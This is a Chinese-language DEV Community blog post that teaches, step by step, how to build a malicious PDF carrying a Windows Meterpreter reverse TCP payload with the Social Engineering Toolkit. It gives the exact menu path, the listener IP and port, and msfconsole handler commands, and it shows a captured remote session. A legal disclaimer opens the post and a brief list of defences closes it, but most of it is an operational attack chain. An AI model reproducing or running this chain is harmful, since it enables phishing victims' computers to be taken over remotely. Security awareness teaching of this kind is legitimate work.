DEV Community

钟智强
钟智强

Posted on

一封 PDF 如何悄悄入侵你的系统?渗透从入门到落地

本文内容及所涉及的技术,仅限用于合法授权下的安全研究、教学演示、
以及漏洞复现。严禁将本文技术用于未授权的渗透、监听、植入、操控行为。

本文内容仅限安全研究、漏洞复现与教学演示使用!

使用者必须在完全理解并接受本声明的前提下继续阅读与操作。
凡将本文所述方法用于非法用途者,一切法律后果由使用者本人承担。

请严格遵守所在地的法律法规,特别是以下中国法律条款:

📜 《中华人民共和国网络安全法》 第十二条:
禁止任何组织或个人利用网络危害国家安全、煽动颠覆政权等活动。

📜 《中华人民共和国刑法》 第二百八十五条至二百八十七条:
非法入侵计算机系统、篡改或破坏数据将追究刑责。

📜 《中华人民共和国数据安全法》 第三条、第十七条:
数据处理活动必须合法合规,严禁非法获取、传输或泄露数据。

🚫 强烈禁止以下行为:

- 向他人 APK 植入恶意代码并传播
- 上传恶意程序至应用市场
- 在未授权设备或网络环境中运行本篇提及的技术

⚖️ 非法使用将触犯法律,作者不承担由此引发的任何后果。

🧪 本文操作均在本地沙箱环境下进行,示例所用 APK 为自定义构建 demo,用于演示完整技术链路,非实际恶意软件。

💡 特别提醒:
本文所涉及操作可能包含网络通信、远程访问、敏感权限调用等,
必须在受控环境下、获得明确授权后进行。
未经许可的任何行为都将被视为违法攻击。

📛 作者立场中立,仅为安全教育目的演示,不对滥用技术行为负责。
Enter fullscreen mode Exit fullscreen mode

PDF也能是武器

当我们说到「本地涉入」、「文件根级」时,很多人第一反应是 .apk.exe.sh这种打开后明显有危险的文件。

但是你有没有想过:一份看上去正常的 PDF ,在软件程序已经被别有用心的情况下也可以是一份致命的 payload?

这篇文章我会手把手教你:

  • 黑客如何使用 SET (社工攻击框架) 来生成恶意 PDF
  • 如何启动监听器等待目标上钩
  • 我们为什么需要增强文件安全意识

工具简介:Social Engineering Toolkit

在这里插入图片描述

我们使用 Kali Linux 自带的 SET (Social Engineering Toolkit) 工具,它能快速构建带有反弹木马的恶意 PDF。

安装命令(如未安装):

git clone https://github.com/trustedsec/social-engineer-toolkit.git
cd social-engineer-toolkit
pip3 install -r requirements.txt
sudo python3 setup.py install
Enter fullscreen mode Exit fullscreen mode

Social Engineering Toolkit (社工攻击框架,简称 SET) 是 Kali Linux 中一个完全为社工攻击而生的工具包。

只需要执行:

sudo setoolkit
Enter fullscreen mode Exit fullscreen mode

菜单选择:

Social-Engineering Attacks > Spear-Phishing Attack Vectors > Create a FileFormat Payload > Adobe PDF Embedded EXE Social Engineering > Rename > Windows Meterpreter Reverse TCP > {IP_地址} > {端口} >  2 > {名称.pdf}
Enter fullscreen mode Exit fullscreen mode

在这里插入图片描述
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

接下来,设置参数:

  • Payload 类型:选择 windows/meterpreter/reverse_tcp
  • LHOST(本地 IP):如 192.168.56.1 或 VPN IP(建议用 ip a 查看 tun0)
  • LPORT(监听端口):常用 4444
  • 生成文件名:如 evil.pdf

输出路径:

生成的 PDF 通常保存在:



PDF文件位于你的Kali Linux目录中(打开Root Terminal Emulator):

然后执行以下命令:

cd /root/.set
mv {PDF文件名} /home/{你的用户名}/Desktop  
# 我的例子是/home/linger/Desktop,可以用pwd命令确认路径
# mv evil.pdf /home/linger/Desktop/
Enter fullscreen mode Exit fullscreen mode

启动监听器等待目标上钩

sudo msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.56.1          # 您的IP地址
set LPORT 4444                  # 端口
run
Enter fullscreen mode Exit fullscreen mode

一旦目标打开 PDF,反向连接建立,Shell 即到你手上!

[*] Meterpreter session 1 opened
meterpreter > sysinfo
Computer        : TARGET-PC
OS              : Windows 10 Pro x64
Enter fullscreen mode Exit fullscreen mode

你现在已经拥有对方机器的远程控制权限。


如何防范这种攻击?

你应该牢记:
⚠️ 永远不要轻信来源不明的 PDF
⚠️ 使用沙箱(如 Windows Sandbox)或虚拟机打开文件
⚠️禁用 PDF 阅读器中的自动脚本执行
⚠️ 安装 IDS/IPS,检测异常出网行为
⚠️ 每个终端部署 EDR(如 CrowdStrike、SentinelOne)


恶意 PDF 攻击不是新鲜事,但它依然是黑产日常武器库中的常规选手。

写这篇文章的目的,不是教你当黑客或搞破坏,而是告诉你:

🔐 如果你连他们是怎么攻击的都不知道,你要怎么防?
提升意识,是网络安全的第一步!

Top comments (0)